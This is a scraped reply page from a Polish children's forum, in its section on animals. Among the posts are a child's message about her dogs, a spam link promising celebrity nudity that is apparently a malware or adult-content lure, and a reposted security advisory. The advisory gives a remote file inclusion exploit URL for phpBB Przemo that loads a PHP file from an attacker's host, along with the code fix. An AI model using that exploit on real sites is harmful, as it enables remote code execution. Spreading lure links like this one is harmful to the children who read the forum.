dla dzieci
Krótki opis Twojego forum [ustaw w panelu administracyjnym]
FAQ
Szukaj
Użytkownicy
Grupy
Galerie
Rejestracja
Profil
Zaloguj się, by sprawdzić wiadomości
Zaloguj
Forum dla dzieci Strona Główna
->
Zwierzęta
Napisz odpowiedź
Użytkownik
Temat
Treść wiadomości
Emotikony
Więcej Ikon
Kolor:
Domyślny
Ciemnoczerwony
Czerwony
Pomarańćzowy
Brązowy
Żółty
Zielony
Oliwkowy
Błękitny
Niebieski
Ciemnoniebieski
Purpurowy
Fioletowy
Biały
Czarny
Rozmiar:
Minimalny
Mały
Normalny
Duży
Ogromny
Zamknij Tagi
Opcje
HTML:
NIE
BBCode
:
TAK
Uśmieszki:
TAK
Wyłącz BBCode w tym poście
Wyłącz Uśmieszki w tym poście
Kod potwierdzający: *
Wszystkie czasy w strefie EET (Europa)
Skocz do:
Wybierz forum
Jakaś kategoria
----------------
Zainteresowania
Zwierzęta
Przegląd tematu
Autor
Wiadomość
Gość
Wysłany: Pią 23:12, 16 Mar 2007
Temat postu:
Christina Ricci Undressing!
http://Christina-Ricci-Undressing.org/WindowsMediaPlayer.php?movie=1020072
haxor
Wysłany: Pon 16:16, 08 Sie 2005
Temat postu:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --====----====----====----====----====----====----====----====----====----===--
Product: phpBB modified by Przemo
Version: v1.8
Vendor:
http://przemo.org/phpBB2/
Discover by: Officerrr <officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitary code execution as webserver user)
- --====----====----====----====----====----====----====----====----====----===--
Description:
This modification is based on phpBB 2.0.X script, it contains about
200 add-ons, with ability to switch off any of them in admin`s panel.
- --====----====----====----====----====----====----====----====----====----===--
Vulnerable code:
File: album_portal.php
Kod:
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
- --====----====----====----====----====----====----====----====----====----===--
Fix:
Change the following lines in album_portal.php file
Kod:
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
to
Kod:
define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
- --====----====----====----====----====----====----====----====----====----===--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]
evil_file.php must exist on the evil_host.
- --
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFAhBFy+p+rYQE3C+ARAsX0AJ4okoVUeq0ehzHMrJJsqPd051kP8wCdE0dc
tKFC2tbN1lJSYXJb1sdttRg=
=NeZg
-----END PGP SIGNATURE-----
Lilia
Wysłany: Czw 14:57, 23 Cze 2005
Temat postu: Kto ma psa?
ja mam 2 pieski Kiare i Skaze to są 2 8 letnie amstafy
fora.pl
- załóż własne forum dyskusyjne za darmo
Powered by
phpBB
© 2001, 2005 phpBB Group
Regulamin